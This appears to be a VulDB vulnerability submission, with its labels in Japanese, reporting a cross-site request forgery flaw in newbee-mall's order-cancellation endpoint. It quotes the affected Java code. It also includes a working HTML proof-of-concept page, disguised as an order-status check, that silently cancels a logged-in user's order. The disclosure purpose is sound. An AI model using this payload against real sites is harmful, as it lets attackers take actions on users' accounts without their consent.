| タイトル | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| 説明 | # CSRF Vulnerability in Order Cancellation
## Summary
A **CSRF vulnerability** exists in the order cancellation endpoint `/orders/{orderNo}/cancel`. Attackers can force authenticated users to cancel their legitimate orders without authorization.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/orders/**");
// ❌ No CSRF protection configured
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 85-95)
```java
@PutMapping("/orders/{orderNo}/cancel")
@ResponseBody
public Result cancelOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
// ❌ No CSRF token validation
// ⚠️ orderNo is predictable (timestamp-based)
String cancelOrderResult = newBeeMallOrderService.cancelOrder(orderNo, user.getUserId());
if (ServiceResultEnum.SUCCESS.getResult().equals(cancelOrderResult)) {
return ResultGenerator.genSuccessResult();
} else {
return ResultGenerator.genFailResult(cancelOrderResult);
}
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Order numbers are predictable and can be enumerated
3. ⚠️ No additional confirmation required
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Order Status Update</title>
</head>
<body>
<h2>Checking your recent orders...</h2>
<div id="status">Please wait...</div>
<script>
// Target order number (can be enumerated or obtained from order history page)
var orderNo = '202602051645001'; // Example order number
fetch('http://localhost:28089/orders/' + orderNo + '/cancel', {
method: 'PUT',
credentials: 'include' // Include session cookie
})
.then(response => response.json())
.then(data => {
document.getElementById('status').innerHTML = 'Update complete!';
})
.catch(err => {
document.getElementById('status').innerHTML = 'Processing...';
});
</script>
</body>
</html>
```
## Impact
**Malicious order cancellation** - Attackers can cancel users' legitimate orders, causing inconvenience and potential business disruption.
---
**CVSS Score**: 6.5 (Medium)
|
|---|
| ソース | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/108 |
|---|
| ユーザー | flashzyc (UID 92850) |
|---|
| 送信 | 2026年02月05日 11:51 (4 月 ago) |
|---|
| モデレーション | 2026年02月18日 07:55 (13 days later) |
|---|
| ステータス | 重複 |
|---|
| VulDBエントリ | 346456 [newbee-ltd newbee-mall 迄 a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints クロスサイトリクエストフォージェリ] |
|---|
| ポイント | 0 |
|---|